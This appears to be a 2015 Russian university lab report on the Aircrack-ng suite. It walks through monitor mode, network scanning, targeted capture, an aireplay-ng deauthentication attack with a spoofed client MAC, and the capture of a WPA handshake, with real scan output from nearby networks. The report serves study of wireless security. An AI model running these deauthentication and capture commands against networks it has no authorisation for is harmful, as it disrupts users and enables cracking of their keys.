## Отчет по лабораторной работе №6 : Набор инструментов для аудита беспроводных сетей AirCrack

### Дедков Сергей

### 2015

### Содержание

1	Цел	ь работы	2
2	Ход	ц работы	2
	2.1	Изучить документацию по основным утилитам пакета –	
		airmon-ng, airodump-ng, aireplay-ng, aircrack-ng	2
	2.2	Запустить режим мониторинга на беспроводном интерфейсе	2
	2.3	Запустить утилиту airodump, изучить формат вывода этой	
		утили-ты, форматы файлов, которые она может создавать	3

### 1 Цель работы

Изучить основные возможности пакета AirCrack и принципы взлома WPA/WPA2 PSK и WEP.

### 2 Ход работы

## 2.1 Изучить документацию по основным утилитам пакета – airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Aircrack-ng - набор программ, предназначенных для обнаружения беспроводных сетей, перехвата передаваемого через беспроводные сети трафика, аудита WEP и WPAWPA2-PSK ключей шифрования (проверка стойкости), в том числе пентеста (Penetration test) беспроводных сетей (подверженность атакам на оборудование и атакам на алгоритмы шифрования).

Программа работает с любыми беспроводными сетевыми адаптерами, драйвер которых поддерживает режим мониторинга (список можно найти на сайте программы). Программа работает в операционных системах Windows, UNIX, Linux и Mac OS X.

Версия для UNIX-подобных операционных систем имеет значительно бышую функциональность и поддерживает больше беспроводных адаптеров, чем Windows-версия. aircrack-ng был также портирован для платформ Zaurus и Maemo. Также программа была портирована для iPhone.

airmon-ng Выставления различных карт в режим мониторинга. aireplay-ng Пакетный инжектор (Linux и Windows).

aircrack-ng Взламывает ключи WEP и WPA (Перебор по словарю).

# 2.2 Запустить режим мониторинга на беспроводном интерфейсе

airmon-ng start wlan0

Found 3 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
-e

PID Name

2221 NetworkManager

3392 wpa\_supplicant

7009 dhclient

Interface Chipset Driver

```
wlan0 Unknown rt18192cu - [phy0] (monitor mode enabled on mon1) mon0 Unknown rt18192cu - [phy0]
```

# 2.3 Запустить утилиту airodump, изучить формат вывода этой утили-ты, форматы файлов, которые она может создавать

Запуск утилиты airodump: airodump-ng mon0

CH 4 ][ Elapsed:	20 6	11 2015 06 0	E 02.E							
CH 4 ][ Etapsed:	20 S	][ 2015-06-0	03:5	0						
BSSID	PWR	Beacons	#Data,	#/s	СН	MB	ENC	CIPHER	AUTH	ESSID
90:C1:15:B3:62:20	-49	100	0	0	6	54e	WPA2	CCMP	PSK	Xperia S_cb96
BC:85:56:66:40:8A	-61	41	0	0	11	54e.	WPA2	CCMP	PSK	nastroisam.ru
B8:A3:86:5B:CB:8C	-65	81	3	0	6	54e	WPA2	CCMP	PSK	<length: 0=""></length:>
00:1F:C6:2A:04:40	-67	26	2	0	11	54	WPA	TKIP	PSK	303
00:21:91:0A:1C:BD	-68	23	3	0	1	54e.	WPA2	CCMP	PSK	digitek labs
40:01:C6:CE:C7:C0	-67	31	55	0	8	54 .	WPA2	TKIP	PSK	KSPT
00:1F:C6:42:3F:C1	-77	46	1	0	6	54	WPA2	CCMP	PSK	Lab209
08:CC:68:0A:7B:60	-97	2	0	0	1	54e.	WPA2	CCMP	PSK	Polytech
00:1F:33:24:1A:90	-97	4	0	0	6	54e.	OPN			DCN
00:1E:58:B8:AA:E7	-92	15	1	0	4	54 .	WPA2	CCMP	PSK	eda-lab
BSSID	STAT	ION	PWR	Rat	e	Los	t I	rames	Prob	e
(not associated)	C4:6	E:1F:25:4E:9	C 0		- 1		0	6		
(not associated)	88:9	F:FA:0E:A8:8	D -49	Θ	- 1		0	9		
(not associated)	AC:8	1:12:18:76:D	E -49	Θ	- 1		0	8	LAB3	92
(not associated)		A:3C:CD:F9:0		Θ	-\ 1		0	2	eda-	lab
(not associated)	5C:9	5:AE:11:22:0	7 -73	Θ	- 1		0	2	digi	tek labs
(not associated)		7:31:7F:B2:3		0	- 1		0	10		
(not associated)		8:3F:43:E9:8			- 1		21	33	SUBW	AY
(not associated)		5:A5:59:CC:6		0	- 1		0	5		
(not associated)	_	B:AF:7C:FF:4			- 1		0	8		
(not associated)		2:C6:1F:A7:6			- 1		93	3	eda-	
(not associated)	68:1	7:29:DF:0B:7	4 -97	0	- 1		0	1	Lab2	09

Рис. 1: Запуск airomon-ng

При указании ключа —write, утилита создает набор файлов с заданным префиксом. Два из которых связаны с информацией о доступных сетях и представлены в двух форматах: csv и xml. Еще два фала содержать информацию о перехваченных пакетах. Файл типа .cap содержит перехваченные пакеты, в то время как csv содержит лишь сокращенную информацию. Стоит отметить, что csv - это формат хранения простой таблицы.

сар - можно открыть в дальнейшем через wireshark, в нем отображаются все пакеты.

No.	Time	Source	Destination	Protocol	Lengtl	Info
	1 0.000000	SonyEric_b3:62:20	Broadcast	802.11	193 E	Beacon frame, SN=25, FN=0, Flags=.
	2 0.000500	D-LinkIn_5b:cb:8c	Broadcast	802.11	249 E	Beacon frame, SN=88, FN=0, Flags=.
	3 0.006128	3comEuro_ce:c7:c0	Broadcast	802.11	117 E	Beacon frame, SN=3635, FN=0, Flags
	4 0.431662	AsustekC_42:3f:cl	Broadcast	802.11	108 E	Beacon frame, SN=1688, FN=0, Flags
	5 0.628782	AsustekC_10:5d:78	IPv4mcast_00:00:fc	802.11	107 [	Data, SN=3643, FN=0, Flags=.pmF
	6 0.633390	AsustekC_10:5d:78	IPv4mcast_00:00:fc	802.11	107 [	Data, SN=3644, FN=0, Flags=.pF
	7 1.150068	D-Link_Oa:lc:bd	Broadcast	802.11	269 E	Beacon frame, SN=3684, FN=0, Flags
	8 1.471620	HonHaiPr_66:40:8a	Broadcast	802.11	136 E	Beacon frame, SN=2718, FN=0, Flags
	9 1.583702	LiteonTe_f1:d5:78	Broadcast	802.11	70 F	Probe Request, SN=1814, FN=0, Flag
	10 1.646190	AsustekC_10:5d:78	IPv4mcast_00:00:fc	802.11	107 [	Data, SN=3671, FN=0, Flags=.pmF
	11 1.648238	AsustekC_10:5d:78	IPv4mcast_00:00:fc	802.11	107 [	Data, SN=3672, FN=0, Flags=.pF
	12 1.749590	AsustekC_78:4a:5a	Spanning-tree-(for-bri	802.11	98 [	Data, SN=3678, FN=0, Flags=.pF
	13 2.010228	HuaweiTe_a6:97:0a	Broadcast	802.11	80 [	Data, SN=3694, FN=0, Flags=.pF
	14 2.238614	D-Link_b8:aa:e7	Broadcast	802.11	106 E	Beacon frame, SN=1538, FN=0, Flags
	15 2.399934	GemtekTe_18:76:de	Broadcast	802.11	122 F	Probe Request, SN=1245, FN=0, Flag

Рис. 2: Запуск airomon-ng

#### Запустить режим мониторинга на беспроводном ин-2.4терфейсе

 $airodum\text{-}ng\ mon0$ 

CH 3 ][ Elapsed: 8 s ][ 2015-06-05 04:10

BSSID	PWR	Beacons #	Data,	#/s	СН	MB	ENC	CIPHER	AUTH	ESSID
90:C1:15:B3:62:20	-46	40	0	0	6	54e	WPA2	CCMP	PSK	Xperia S_cb9
BC:85:56:66:40:8A	-49	23	0	0	11	54e.	WPA2	CCMP	PSK	nastroisam.r
00:1F:C6:2A:04:40	-57	17	1	0	11	54	WPA	TKIP	PSK	303
B8:A3:86:5B:CB:8C	-67	37	1	0	6	54e	WPA2	CCMP	PSK	<length: 0=""></length:>
00:21:91:0A:1C:BD	-71	10	2	0	1	54 .	WPA2	CCMP	PSK	digitek labs
00:1F:C6:42:3F:C1	-77	25	1	0	6	54	WPA2	CCMP	PSK	Lab209
40:01:C6:CE:C7:C0	-69	33	28	0	8	54 .	WPA2	TKIP	PSK	KSPT
00:1E:58:B8:AA:E7	-97	2	0	0	4	54 .	WPA2	CCMP	PSK	eda-lab
BSSID	STAT	ION	PWR	Ra	te	Los	t ]	Frames	Probe	е
(not associated)	00:C	2:C6:1F:A7:61	-97	0	- 1		0	2	eda-	lab
(not associated)	74:2	F:68:D8:76:12	-47	0	- 1		30	8	KSPT	
(not associated)	88:9	F:FA:0E:A8:8D	-49	0	- 1		12	12		
(not associated)	78:E	4:00:C7:72:14	-61	0	- 1		16	5	Lab20	09
(not associated)	F4:0	9:D8:0C:7E:8F	-73	0	- 1		25	4		
(not associated)	A4:1	7:31:7F:B2:3D	-43	0	- 1		6	7		

### 2.5 Запустить сбор трафика для получения аутентификационных сообщений

airodump-ng mon0 -w new1 -bssid 40:01:C6:CE:C7:C0

CH 13 ][ Elapsed: 56 s ][ 2015-06-05 04:34

**BSSID** PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 40:01:C6:CE:C7:C0 54 . WPA2 TKIP -77 108 229 5 8 PSK KSPT BSSID Frames Probe STATION PWR. Rate Lost

# 2.6 Произвести деаутентификацию одного из клиентов, до тех пор, пока не удастся собрать необходимых для взлома аутенти-фикационных сообщений

```
aireplay-ng --ignore-negative-one --deauth 150 -a 40:01:C6:CE:C7:C0 -h A4:17:31:7F:B2
The interface MAC (C4:6E:1F:25:4E:9C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether A4:17:31:7F:B2:3D
04:49:25 Waiting for beacon frame (BSSID: 40:01:C6:CE:C7:C0) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
04:49:25 Sending DeAuth to broadcast -- BSSID: [40:01:C6:CE:C7:C0]
04:49:26 Sending DeAuth to broadcast -- BSSID: [40:01:C6:CE:C7:C0]
04:49:27 Sending DeAuth to broadcast -- BSSID: [40:01:C6:CE:C7:C0]
```

#### 2.7

В результате перехватываем пакет handshake:

```
airodump-ng mon0 --bssid 1C:7E:E5:39:26:F8 -c 6
--write dump --ignore-negative-one
CH 6 [ Elapsed: 1 min ] [ 2015-06-03 21:30 ] [ WPA handshake: 1C:7E:E5:39:26:F
                                                           ENC CIPHER AUTH E
BSSID
                  PWR RXQ Beacons
                                      #Data, #/s CH MB
1C:7E:E5:39:26:F8
                 -47 100
                               880
                                                   4 54e. WPA2 CCMP
                                        791
                                                                       PSK 11
BSSID
                  STATION
                                     PWR
                                           Rate
                                                   Lost Packets Probes
                                            0e- 1
1C:7E:E5:39:26:F8 74:E5:43:65:15:F5 -32
                                                       0
                                                              645 18
```